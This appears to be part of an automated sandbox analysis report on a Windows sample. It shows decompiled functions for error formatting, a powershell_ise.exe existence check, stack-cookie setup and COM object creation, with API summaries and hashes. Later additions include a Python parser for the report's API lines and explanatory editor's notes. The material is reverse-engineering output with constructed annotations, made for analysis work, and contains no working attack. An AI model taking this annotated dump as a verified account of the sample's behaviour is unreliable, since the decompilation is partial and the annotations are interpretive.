                                                                                                                                                                                                                              • Source File: 0000000E.00000002.391222410.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                              • Opcode ID: 488cefd9ab3f6476f09f597e6870703c6b8349b7b9416e71a284c883d1fff0f8
                                                                                                                                                                                                                              • Instruction ID: 36a2a23bac92217984f6f5b4ca16a243b7de4a16ddf132af6aa03ee1ad9e059b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 488cefd9ab3f6476f09f597e6870703c6b8349b7b9416e71a284c883d1fff0f8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB21D5B2804259DFDF22CF94C8847EEBBB4FF09314F048189E545AB621C3399555CB91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetConsoleMode.KERNELBASE(?,?), ref: 0337F39A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.391222410.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleMode
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4145635619-0
                                                                                                                                                                                                                              • Opcode ID: baeb45f42ba48b72e3d74bb2f12f5269b095ceeb935c230b1e3a528854fe5156
                                                                                                                                                                                                                              • Instruction ID: 062a3431fdbfeb28fb8944dbc06607462f60f9dd2084653d6989cc023744cffb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: baeb45f42ba48b72e3d74bb2f12f5269b095ceeb935c230b1e3a528854fe5156
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 331103B1D106599FDB10CF9AC884BDEFBB4BB08224F048129D918B7240D378A944CFE5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetConsoleMode.KERNELBASE(?,?), ref: 0337F39A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.391222410.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: false
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleMode
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4145635619-0
                                                                                                                                                                                                                              • Opcode ID: 53e84bcdcaadd94362f0325be43dddb545f22e6cc756b3f34a4339f472bdb083
                                                                                                                                                                                                                              • Instruction ID: 60755ac788c486140f01df0a773b0eaad2b6bddfd2a71aad9a17aea744ef2989
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 53e84bcdcaadd94362f0325be43dddb545f22e6cc756b3f34a4339f472bdb083
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A11129B6D002599FDB10CF9AD4847DEFBB4BB08324F148529D428B7240D378A944CFE1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
                                                                                                                                                                                                                              • Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp Download File
• Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp
• Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp
Similarity
• API ID: __wgetmainargs
• String ID:
• API String ID: 1709950718-0
• Opcode ID: 9df6b8f1225a6dc531b1889ef3ebb7916e9d6b7f3652544f40df8364e9d2493c
• Instruction ID: 132dfe91ab2dfb91d46be5351e4c181a286937a0def9c367e4a37b3bf946f495
• Opcode Fuzzy Hash: 9df6b8f1225a6dc531b1889ef3ebb7916e9d6b7f3652544f40df8364e9d2493c
• Instruction Fuzzy Hash: 60D0E9B0671340EF8B60AB6AB90A8133A64B688A13710855DF541911E9D7B174F0BB1D
Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

C-Code - Quality: 84%
E012590D0(intOrPtr _a4, void* _a8, void** _a12, void* _a16, intOrPtr _a20, char _a24) {
	signed int _v8;
	void* _v9;
	short _v16;
	short _v20;
	char* _v24;
	void* __ebx;
	void* __edi;
	void* __esi;
	void* __ebp;
	signed int _t43;
	void* _t46;
	signed int* _t47;
	short _t49;
	long _t50;
	intOrPtr* _t57;
	void* _t60;
	void* _t65;
	signed int _t69;
	signed int* _t70;
	void* _t71;
	void* _t87;
	void* _t92;
	void* _t94;
	void* _t95;
	void* _t96;
	void* _t99;
	void** _t100;
	signed int _t101;
	void* _t102;
	void* _t103;

	_t43 =  *0x1260358; // 0xc21f7063
	_v8 = _t43 ^ _t101;
	_v20 = 0;
	_v24 =  &_a24;
	_t46 = _a8;
	_v9 = 1;
	if(_t46 == 0) {
		L23:
		_t47 = 0;
		L21:
		return E01259A40(_t47, _t70, _v8 ^ _t101, _t88, _t92, _t95);
	}
	_t70 = _a12;
	if(_t70 == 0) {
		goto L23;
	}
	_t92 = _a16;
	if(_t92 == 0) {
		goto L23;
	}
	_push(_t95);
	_t49 = FormatMessageW(0x500, _t46, 0, 0,  &_v20, 0,  &_v24);
	_v16 = _t49;
	_t111 = _t49;
	if(_t49 == 0) {
		_t50 = GetLastError();
		_v16 = 0;
		_t96 = FormatMessageW(0x1100, 0, _t50, 0,  &_v16, 0, 0);
		__eflags = _t96;
		if(_t96 == 0) {
			L31:
			_t47 = 0;
			L20:
			_pop(_t95);
			goto L21;
		}
		_t28 = _t96 + 1; // 0x1
		_t88 = _t28 * 2 >> 0x20;
		_t92 = E0125972E( ~(0 | __eflags > 0x00000000) | _t28 * 0x00000002);
		_t103 = _t102 + 4;
		__eflags = _t92;
		if(_t92 != 0) {
			_t36 = _t96 + 1; // 0x1
			_t88 = _t36;
			_t60 = E0125CE50(_t92, _t36, _v16);
			__eflags = _t60;
			if(_t60 < 0) {
				_t96 = 0;
				free(_t92);
				_t103 = _t103 + 4;
				_t92 = 0;
				__eflags = 0;
			}
		}
		LocalFree(_v16);
		__eflags = _t96;
		if(_t96 != 0) {
			_t57 =  *((intOrPtr*)(_a4 + 4));
			 *0x1261204(_t57, 0, _a20, _t92);
			 *((intOrPtr*)( *((intOrPtr*)( *_t57 + 4))))();
			__eflags = _t92;
			if(_t92 != 0) {
				free(_t92);
			}
		}
		goto L31;
	}
	_t12 = _t49 + 1; // 0x1
	_t99 = _t12;
	_t88 = E0125972E( ~(0 | _t111 > 0x00000000) | _t99 * 0x00000002);
	 *_t70 = _t88;
	if(_t88 == 0) {
		L22:
		_t70 = 0;
		L19:
		LocalFree(_v20);
		_t47 = _t70;
		goto L20;
	}
	_t71 = 0;
	if(_t99 == 0 || _t99 > 0x7fffffff) {
		_t71 = 0x80070057;
	}
	if(_t71 < 0) {
		__eflags = _t99;
		if(_t99 == 0) {
			goto L17;
		}
		goto L16;
	} else {
		_t87 = _v20;
		_t71 = 0;
		if(_t99 == 0) {
			L13:
			_t88 = _t88 - 2;
			_t71 = 0x8007007a;
			goto L15;
		} else {
			_t94 = 0x7ffffffe - _t99;
			while(_t94 + _t99 != 0) {
				_t69 =  *_t87 & 0x0000ffff;
                                                                                                                                                                                                                              							if(_t69 == 0) {
                                                                                                                                                                                                                              								break;
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              							 *_t88 = _t69;
                                                                                                                                                                                                                              							_t87 = _t87 + 2;
                                                                                                                                                                                                                              							_t88 = _t88 + 2;
                                                                                                                                                                                                                              							_t99 = _t99 - 1;
                                                                                                                                                                                                                              							if(_t99 != 0) {
                                                                                                                                                                                                                              								continue;
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              							goto L13;
                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                              						__eflags = _t99;
                                                                                                                                                                                                                              						if(_t99 == 0) {
                                                                                                                                                                                                                              							goto L13;
                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                              						L15:
                                                                                                                                                                                                                              						_t92 = _a16;
                                                                                                                                                                                                                              						L16:
                                                                                                                                                                                                                              						 *_t88 = 0;
                                                                                                                                                                                                                              						L17:
                                                                                                                                                                                                                              						if(_t71 < 0) {
                                                                                                                                                                                                                              							_t100 = _a12;
                                                                                                                                                                                                                              							_t65 =  *_t100;
                                                                                                                                                                                                                              							__eflags = _t65;
                                                                                                                                                                                                                              							if(_t65 != 0) {
                                                                                                                                                                                                                              								free(_t65);
                                                                                                                                                                                                                              								 *_t100 = 0;
                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                              							goto L22;
                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                              							_t70 = _v9;
                                                                                                                                                                                                                              							 *_t92 = _v16;
                                                                                                                                                                                                                              							goto L19;
                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                              			}
0x012590d8
0x012590df
0x012590e5
0x012590ec
0x012590ef
0x012590f2
0x012590fa
0x012591f7
0x012591f7
0x012591e3
0x012591f2
0x012591f2
0x01259100
0x01259105
0x00000000
0x00000000
0x0125910b
0x01259110
0x00000000
0x00000000
0x01259116
0x0125912b
0x01259131
0x01259134
0x01259136
0x0125b377
0x0125b384
0x0125b39c
0x0125b39e
0x0125b3a0
0x0125b41b
0x0125b41b
0x012591e2
0x012591e2
0x00000000
0x012591e2
0x0125b3a4
0x0125b3ac
0x0125b3bb
0x0125b3bd
0x0125b3c0
0x0125b3c2
0x0125b3c7
0x0125b3c7
0x0125b3cc
0x0125b3d1
0x0125b3d3
0x0125b3d6
0x0125b3d8
0x0125b3dd
0x0125b3e0
0x0125b3e0
0x0125b3e0
0x0125b3d3
0x0125b3e5
0x0125b3eb
0x0125b3ed
0x0125b3f6
0x0125b403
0x0125b409
0x0125b40e
0x0125b410
0x0125b413
0x0125b418
0x0125b410
0x00000000
0x0125b3ed
0x0125913c
0x0125913c
0x01259157
0x0125915c
0x01259160
0x012591f3
0x012591f3
0x012591d7
0x012591da
0x012591e0
0x00000000
0x012591e0
0x01259166
0x0125916a
0x0125b422
0x0125b422
0x0125917e
0x0125b42c
0x0125b42e
0x00000000
0x00000000
0x00000000
0x01259184
0x01259184
0x01259187
0x0125918b
0x012591b1
0x012591b1
0x012591b4
0x00000000
0x0125918d
                                                                                                                                                                                                                              0x01259192
                                                                                                                                                                                                                              0x01259194
                                                                                                                                                                                                                              0x0125919b
                                                                                                                                                                                                                              0x012591a1
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012591a3
                                                                                                                                                                                                                              0x012591a6
                                                                                                                                                                                                                              0x012591a9
                                                                                                                                                                                                                              0x012591ac
                                                                                                                                                                                                                              0x012591af
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012591af
                                                                                                                                                                                                                              0x012591bb
                                                                                                                                                                                                                              0x012591bd
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012591bf
                                                                                                                                                                                                                              0x012591bf
                                                                                                                                                                                                                              0x012591c2
                                                                                                                                                                                                                              0x012591c4
                                                                                                                                                                                                                              0x012591c7
                                                                                                                                                                                                                              0x012591c9
                                                                                                                                                                                                                              0x0125b439
                                                                                                                                                                                                                              0x0125b43c
                                                                                                                                                                                                                              0x0125b43e
                                                                                                                                                                                                                              0x0125b440
                                                                                                                                                                                                                              0x0125b447
                                                                                                                                                                                                                              0x0125b44f
                                                                                                                                                                                                                              0x0125b44f
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012591cf
                                                                                                                                                                                                                              0x012591d2
                                                                                                                                                                                                                              0x012591d5
                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                              0x012591d5
                                                                                                                                                                                                                              0x012591c9
                                                                                                                                                                                                                              0x0125918b

APIs
• FormatMessageW.KERNEL32(00000500,00000017,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?), ref: 0125912B
• LocalFree.KERNEL32(00000000), ref: 012591DA
• GetLastError.KERNEL32 ref: 0125B377
• FormatMessageW.KERNEL32(00001100,00000000,00000000,00000000,00000017,00000000,00000000), ref: 0125B396
• free.MSVCRT(00000000,00000000), ref: 0125B3D8
• LocalFree.KERNEL32(00000000), ref: 0125B3E5
• free.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00002014,00000001,?), ref: 0125B413
  • Part of subcall function 0125972E: malloc.MSVCRT ref: 01259748
• free.MSVCRT(00000000), ref: 0125B447
Memory Dump Source
• Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
• Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp
• Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp
Similarity
• API ID: free$FormatFreeLocalMessage$ErrorLastmalloc
• String ID:
• API String ID: 2313333890-0
• Opcode ID: af6f6bc3c9b93c16d90a6e4fa761e569b4e8f0d166d2c0e44876e44b778bc600
• Instruction ID: c3bd97a2b216ea22d80f192c2a05ba28f1f461328425bda439e57eb1732e5aa4
• Opcode Fuzzy Hash: af6f6bc3c9b93c16d90a6e4fa761e569b4e8f0d166d2c0e44876e44b778bc600
• Instruction Fuzzy Hash: 8B51F775A20216DBEF608F68CCC9BBB7BA6EF44704F148119EE01A7284DB75E940C791
Uniqueness
Uniqueness Score: -1.00%
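The "APIs" summaries in this report (the FormatMessageW/LocalFree function above and the powershell_ise.exe probe E0125C197 below) share one line format: a bullet, an optional "Part of subcall function NNNN:" prefix, API.MODULE, an optional argument list with "?" for values the decompiler could not recover, and "ref:" followed by the call address. The parser below is an added example and is not part of the Joe Sandbox report or its tooling. It turns those lines into records, decodes the dwFlags argument of the two FormatMessageW calls (both recorded values carry FORMAT_MESSAGE_ALLOCATE_BUFFER, which is why the same function also calls LocalFree twice) and tallies allocating calls against release calls. The sample input is the report's own lines copied into the script; the flag constants are the documented Win32 values; the record, regex and function names are the example's own.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample input: the "APIs" lines of the two function summaries on this
# page, copied verbatim (the second shows a string argument and a subcall line).
SAMPLE_ERR_FUNC = """\
• FormatMessageW.KERNEL32(00000500,00000017,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?), ref: 0125912B
• LocalFree.KERNEL32(00000000), ref: 012591DA
• GetLastError.KERNEL32 ref: 0125B377
• FormatMessageW.KERNEL32(00001100,00000000,00000000,00000000,00000017,00000000,00000000), ref: 0125B396
• free.MSVCRT(00000000,00000000), ref: 0125B3D8
• LocalFree.KERNEL32(00000000), ref: 0125B3E5
• free.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00002014,00000001,?), ref: 0125B413
  • Part of subcall function 0125972E: malloc.MSVCRT ref: 01259748
• free.MSVCRT(00000000), ref: 0125B447
"""

SAMPLE_PROBE_FUNC = r"""
• malloc.MSVCRT ref: 0125C1BC
• ExpandEnvironmentStringsW.KERNEL32(%systemroot%\system32\windowspowershell\v1.0\powershell_ise.exe,00000000,00000104), ref: 0125C1D4
• FindFirstFileW.KERNEL32(00000000,?), ref: 0125C1E8
• FindClose.KERNEL32(00000000), ref: 0125C1F5
• free.MSVCRT(00000000), ref: 0125C1FC
"""

# One summary line: optional subcall prefix, API.MODULE, optional (args), ref: address.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Documented Win32 values for the dwFlags argument of FormatMessage.
FORMAT_MESSAGE_FLAGS = {
    0x0100: "FORMAT_MESSAGE_ALLOCATE_BUFFER",
    0x0200: "FORMAT_MESSAGE_IGNORE_INSERTS",
    0x0400: "FORMAT_MESSAGE_FROM_STRING",
    0x0800: "FORMAT_MESSAGE_FROM_HMODULE",
    0x1000: "FORMAT_MESSAGE_FROM_SYSTEM",
    0x2000: "FORMAT_MESSAGE_ARGUMENT_ARRAY",
}


@dataclass
class ApiCall:
    api: str
    module: str
    raw_args: List[str]          # arguments exactly as printed in the report
    args: List[Optional[int]]    # hex values; None for '?' or for string arguments
    ref: int                     # address of the call instruction
    subcall_of: Optional[int]    # set when the call sits in a callee the summary inlines


def _arg(text: str) -> Optional[int]:
    """'?' means the decompiler could not recover the value; strings stay in raw_args."""
    try:
        return int(text, 16)
    except ValueError:
        return None


def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if m is None:
            raise ValueError(f"unrecognised API summary line: {line!r}")
        raw = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        calls.append(ApiCall(
            api=m.group("api"), module=m.group("mod"),
            raw_args=raw, args=[_arg(a) for a in raw],
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


def decode_format_message_flags(value: int) -> List[str]:
    return [name for bit, name in sorted(FORMAT_MESSAGE_FLAGS.items()) if value & bit]


def release_balance(calls: List[ApiCall]) -> Dict[str, int]:
    """FormatMessage with ALLOCATE_BUFFER returns a LocalAlloc'd buffer that must go to
    LocalFree; malloc pairs with free. The summary lists only calls the decompiler
    attributes to this function, so an imbalance is a prompt to read the code, not
    proof of a leak or double free."""
    fm_alloc = sum(1 for c in calls if c.api == "FormatMessageW" and c.args
                   and c.args[0] is not None and c.args[0] & 0x0100)
    names = Counter(c.api for c in calls)
    return {"FormatMessageW(ALLOCATE_BUFFER)": fm_alloc, "LocalFree": names["LocalFree"],
            "malloc": names["malloc"], "free": names["free"]}


if __name__ == "__main__":
    for c in parse_api_lines(SAMPLE_ERR_FUNC):
        if c.api == "FormatMessageW":
            print(f"{c.ref:08X} FormatMessageW {decode_format_message_flags(c.args[0])}")
    print(release_balance(parse_api_lines(SAMPLE_ERR_FUNC)))
```

The regex deliberately raises on a line it does not understand rather than skipping it, so a report whose layout differs from this one surfaces immediately instead of silently producing an incomplete call list.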

                                                                                                                                                                                                                              C-Code - Quality: 75%
			E0125C197() {
				signed int _v8;
				struct _WIN32_FIND_DATAW _v604;
				void* __edi;
				void* __esi;
				signed int _t4;
				void* _t12;
				void* _t14;
				void* _t19;
				void* _t21;
				void* _t22;
				void* _t24;
				void* _t25;
				signed int _t26;

				_t28 = (_t26 & 0xfffffff8) - 0x258;                                                                               // 0x0125c19f  8-byte-align the stack and reserve 0x258 bytes (room for the WIN32_FIND_DATAW below)
				_t4 =  *0x1260358; // 0xc21f7063                                                                                 // 0x0125c1a5  global stack cookie (/GS pattern)
				_v8 = _t4 ^ (_t26 & 0xfffffff8) - 0x00000258;                                                                     // 0x0125c1ac  cookie XOR frame address, re-checked in the epilogue
				_t21 = 0;                                                                                                         // 0x0125c1ba  result: 0 = file not found
				_t24 = malloc(0x20a);                                                                                             // 0x0125c1c2  0x20a bytes = 261 WCHARs, one more than the 0x104 (260) character limit passed below
				if(_t24 != 0) {                                                                                                   // 0x0125c1c7
					if(ExpandEnvironmentStringsW(L"%systemroot%\\system32\\windowspowershell\\v1.0\\powershell_ise.exe", _t24, 0x104) - 1 <= 0x103) {   // 0x0125c1e0  unsigned compare: true only for 1 <= return <= 0x104, so a failed (0) or truncated (> 0x104) expansion is rejected
						_t12 = FindFirstFileW(_t24,  &_v604);                                                                     // 0x0125c1e8  existence probe for powershell_ise.exe; the file itself is never opened
						if(_t12 != 0xffffffff) {                                                                                  // 0x0125c1f1  INVALID_HANDLE_VALUE: the path does not exist
							_t21 = 1;                                                                                             // 0x0125c1f4  found
							FindClose(_t12);                                                                                      // 0x0125c1f5
						}                                                                                                         // 0x0125c1f5
					}                                                                                                             // 0x0125c1f1
					free(_t24);                                                                                                   // 0x0125c1fc
				}                                                                                                                 // 0x0125c202
				_pop(_t22);                                                                                                       // 0x0125c20c  restore callee-saved registers
				_pop(_t25);                                                                                                       // 0x0125c20d
				return E01259A40(_t21, _t14, _v8 ^ _t28, _t19, _t22, _t25);                                                       // 0x0125c218  E01259A40 receives _v8 ^ _t28 as a /GS cookie check would; _t21 carries the result (1 if powershell_ise.exe exists)
			}

APIs
• malloc.MSVCRT ref: 0125C1BC
• ExpandEnvironmentStringsW.KERNEL32(%systemroot%\system32\windowspowershell\v1.0\powershell_ise.exe,00000000,00000104), ref: 0125C1D4
• FindFirstFileW.KERNEL32(00000000,?), ref: 0125C1E8
• FindClose.KERNEL32(00000000), ref: 0125C1F5
• free.MSVCRT(00000000), ref: 0125C1FC
Strings
• %systemroot%\system32\windowspowershell\v1.0\powershell_ise.exe, xrefs: 0125C1CF
Memory Dump Source
• Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
• Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp
• Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp
Similarity
• API ID: Find$CloseEnvironmentExpandFileFirstStringsfreemalloc
• String ID: %systemroot%\system32\windowspowershell\v1.0\powershell_ise.exe
• API String ID: 2430906653-803825474
• Opcode ID: 747b4a79dbc2214588f1e0c7668a17a30341a35c7dd3b5f18bb5fe8dbd067839
• Instruction ID: 6aec9891fd78822b1608bccdd711498e83040307f2ba209060321b64b90dd058
• Opcode Fuzzy Hash: 747b4a79dbc2214588f1e0c7668a17a30341a35c7dd3b5f18bb5fe8dbd067839
• Instruction Fuzzy Hash: 82F04F32618640ABD330A729BC8C9BF3B58DBC9332F004219FE29D21D0EB70582183A6
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
/* Editor's note: this matches the MSVC CRT __security_init_cookie routine.
   0xBB40E64E is the default x86 /GS stack cookie, so this is compiler runtime
   boilerplate rather than malware-specific logic. The cookie is derived from
   the system time, process id, thread id, tick count, performance counter and
   a stack address, stored at 0x1260358, with its complement at 0x126035c. */
E0125A093() {
    void* _v8;
    struct _FILETIME _v16;
    signed int _v20;
    union _LARGE_INTEGER _v24;
    signed int _t23;
    signed int _t36;
    signed int _t37;
    signed int _t39;

    _v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
    _v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
    _t23 =  *0x1260358; // 0xc21f7063 (current __security_cookie value in the dump)
    /* only (re)initialise if the cookie is still the default or has no high bits */
    if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
        GetSystemTimeAsFileTime( &_v16);
        _v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
        _v8 = _v8 ^ GetCurrentProcessId();
        _v8 = _v8 ^ GetCurrentThreadId();
        _v8 = GetTickCount() ^ _v8 ^  &_v8;
        QueryPerformanceCounter( &_v24);
        _t36 = _v20 ^ _v24.LowPart ^ _v8;
        _t39 = _t36;
        /* never store the default value or a cookie with an empty high word */
        if(_t36 == 0xbb40e64e || ( *0x1260358 & 0xffff0000) == 0) {
            _t36 = 0xbb40e64f;
            _t39 = 0xbb40e64f;
        }
         *0x1260358 = _t39; // __security_cookie
    }
    _t37 =  !_t36;
     *0x126035c = _t37; // __security_cookie_complement
    return _t37;
}

Instruction addresses: 0x0125a09b 0x0125a09f 0x0125a0a3 0x0125a0b6 0x0125a0c0 0x0125a0cc 0x0125a0d5 0x0125a0de 0x0125a0ef 0x0125a0f6 0x0125a102 0x0125a105 0x0125a109 0x0125a113 0x0125a118 0x0125a118 0x0125a11a 0x0125a11a 0x0125a120 0x0125a123 0x0125a12c

APIs
• GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0125A0C0
• GetCurrentProcessId.KERNEL32 ref: 0125A0CF
• GetCurrentThreadId.KERNEL32 ref: 0125A0D8
• GetTickCount.KERNEL32 ref: 0125A0E1
• QueryPerformanceCounter.KERNEL32(?), ref: 0125A0F6
Memory Dump Source
• Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
• Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp
• Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp
Similarity
• API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
• String ID:
• API String ID: 1445889803-0
• Opcode ID: de9389a00e45ac5be7014513a18ea6391ac1b564c9a0f1a909fbed3cd2d4412f
• Instruction ID: d41e78091770f6c5a6dfd4b770fe69cff99a88c064c2edf55b2cca05d3bb4dc8
• Opcode Fuzzy Hash: de9389a00e45ac5be7014513a18ea6391ac1b564c9a0f1a909fbed3cd2d4412f
• Instruction Fuzzy Hash: 84111C71E20248EBCF21DFB8E58D6AEBBF4EF48351F658556E901E7258E6309A109B40
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 51%
/* Editor's note: partial decompilation; the listing is cut off in the report.
   The routine initialises COM, creates an object with CoCreateInstance using a
   CLSID at 0x12531c0 and an IID at 0x125336c (neither is resolved in the
   report), then calls a method through the object's vtable. */
E0125C231(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
    void* _t21;
    intOrPtr* _t24;
    void* _t28;
    intOrPtr* _t29;
    void* _t49;

    _t33 = __ebx;
    E0125A5F0(E0125A825, __ebx, __edi, __esi); // SEH/stack frame prologue helper
    _t46 = __ecx;
    _t48 = 0;
    __imp__CoInitialize(0, 0x10);
     *((intOrPtr*)(_t49 - 0x14)) = 0;
    _t21 = _t49 - 0x14;
     *((intOrPtr*)(_t49 - 4)) = 0;
     *((intOrPtr*)(_t49 - 0x1c)) = 0;
    /* CoCreateInstance(rclsid=0x12531c0, pUnkOuter=0, CLSCTX_INPROC_SERVER, riid=0x125336c, ppv) */
    __imp__CoCreateInstance(0x12531c0, 0, 1, 0x125336c, _t21);
    if(_t21 < 0) {
        L7:
        __imp__CoUninitialize();
        L8:
        E01259691(_t49 - 0x14);
        return E0125A59F(_t33, _t46, _t48);
    }
     *((intOrPtr*)(_t49 - 0x18)) = 0;
     *((char*)(_t49 - 4)) = 1;
    _t24 =  *((intOrPtr*)(_t49 - 0x14));
    _t48 =  *_t24;
     *0x1261204(_t24, _t49 - 0x1c, 0x1253c18, _t49 - 0x18);
    /* vtable slot 4 (offset 0x10) of the created object */
    if( *((intOrPtr*)( *_t24 + 0x10))() < 0) {
        L6:
        E01259691(_t49 - 0x18);
        goto L7;
                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                              				if( *((intOrPtr*)(_t49 - 0x1c)) >= 4) {
                                                                                                                                                                                                                              					_t28 = E0125BC92(__ebx,  *((intOrPtr*)(_t49 - 0x14)), __ecx, __ecx, _t48, __eflags);
                                                                                                                                                                                                                              					__eflags = _t28;
                                                                                                                                                                                                                              					if(_t28 >= 0) {
                                                                                                                                                                                                                              						_t29 =  *((intOrPtr*)(_t49 - 0x14));
                                                                                                                                                                                                                              						_t48 =  *((intOrPtr*)( *_t29 + 0x20));
                                                                                                                                                                                                                              						 *0x1261204(_t29);
                                                                                                                                                                                                                              						 *((intOrPtr*)( *((intOrPtr*)( *_t29 + 0x20))))();
                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                              					goto L6;
                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                              				E01259691(_t49 - 0x18);
                                                                                                                                                                                                                              				goto L8;
                                                                                                                                                                                                                              			}

APIs
• __EH_prolog3_GS.LIBCMT ref: 0125C238
• CoInitialize.OLE32(00000000), ref: 0125C242
• CoCreateInstance.OLE32(012531C0,00000000,00000001,0125336C,?), ref: 0125C262
• CoUninitialize.OLE32 ref: 0125C2CF
Memory Dump Source
• Source File: 0000000E.00000002.388466152.0000000001251000.00000020.00020000.sdmp, Offset: 01250000, based on PE: true
• Associated: 0000000E.00000002.388442354.0000000001250000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.388616544.0000000001260000.00000004.00020000.sdmp
• Associated: 0000000E.00000002.388688313.0000000001261000.00000002.00020000.sdmp
• Associated: 0000000E.00000002.389128954.00000000012B3000.00000002.00020000.sdmp
Similarity
• API ID: CreateH_prolog3_InitializeInstanceUninitialize
• String ID:
• API String ID: 3977827446-0
• Opcode ID: dfcd8511d079e3e36db4da3b906ea03fe33fc897518228e382a713f07241b972
• Instruction ID: 0e3ca58a2587fa3791595dc21c0bfa17aa7c5b41b4b263d47af834e0f7b6c826
• Opcode Fuzzy Hash: dfcd8511d079e3e36db4da3b906ea03fe33fc897518228e382a713f07241b972
• Instruction Fuzzy Hash: DA116D70A1021ADFCB54DBA0D9899BF7B78FF54745B104018E902A7290DB70AA55CBA1
Uniqueness

Uniqueness Score: -1.00%

